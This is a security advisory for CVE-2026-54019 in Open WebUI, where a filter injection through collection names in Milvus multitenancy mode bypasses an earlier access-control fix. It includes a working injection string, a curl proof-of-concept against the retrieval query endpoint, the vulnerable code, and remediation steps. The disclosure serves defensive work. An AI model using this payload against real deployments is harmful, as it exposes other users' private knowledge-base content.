PT-2026-50591 · Pypi · Open-Webui

Published

2026-06-17

·

Updated

2026-06-17

·

CVE-2026-54019

CVSS v3.1

6.5

Medium

VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

RAG ACL Bypass in Milvus Multitenancy Mode

Summary

This is a bypass of the fix for:
  • GHSA-h36f-rqpx-j5wx
  • CVE-2026-44560
  • "Unauthorized File and Knowledge Base Content Access via RAG Vector Search"
Open WebUI added collection-level ACL checks, but the patch can still be bypassed when Milvus multitenancy mode is enabled. The ACL allows unknown non-KB collection names as legacy/ephemeral collections. In Milvus multitenancy mode, that user-controlled collection name becomes a resource id and is interpolated into a Milvus expression without escaping.
An authenticated non-admin user can query:
text
x' or resource id != '' or resource id == 'x
This passes the Open WebUI ACL as an unknown collection, but Milvus evaluates:
text
resource id == 'x' or resource id != '' or resource id == 'x'
That returns private knowledge-base chunks belonging to other users.

Affected Configuration

Tested on:
text
Open WebUI: v0.9.5, commit 3660bc00f
VECTOR DB=milvus
ENABLE MILVUS MULTITENANCY MODE=true
This is not a default-vector-store issue. It affects production deployments using Milvus multitenancy.

Impact

An authenticated low-privilege user can read private RAG / knowledge-base content they do not have access to. No victim interaction is required.

Root Cause

ACL permits unknown collection names:
python
# backend/open webui/retrieval/utils.py
elif not await Knowledges.get knowledge by id(name):
  validated.add(name)
Milvus multitenancy then treats the same name as resource id and builds unsafe expressions:
python
# backend/open webui/retrieval/vector/dbs/milvus multitenancy.py
expr=f"{RESOURCE ID FIELD} == '{resource id}'"
Affected paths include:
text
POST /api/v1/retrieval/query/collection
POST /api/v1/retrieval/query/doc

PoC

Request:
bash
curl -s -X POST "$TARGET/api/v1/retrieval/query/collection" 
 -H "Authorization: Bearer $ATTACKER TOKEN" 
 -H "Content-Type: application/json" 
 --data-binary @- <<'JSON'
{
 "collection names": [
  "x' or resource id != '' or resource id == 'x"
 ],
 "query": "anything",
 "k": 10,
 "hybrid": false
}
JSON
Actual result: private chunks from other users' knowledge collections are returned.
Expected result: request should be rejected with 403 or return no unauthorized content.

Remediation

  1. Do not allow arbitrary unknown collection names in user-controlled RAG query endpoints.
  2. Escape or parameterize Milvus expression values before building filters.
  3. Reject collection names containing quotes/control characters unless they match a known internal format.
  4. Add a regression test for this payload in Milvus multitenancy mode:
text
x' or resource id != '' or resource id == 'x

Fix

Missing Authorization

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-943CWE-862

Related Identifiers

CVE-2026-54019
GHSA-P5CP-R7RG-QPXC

Affected Products

Open-Webui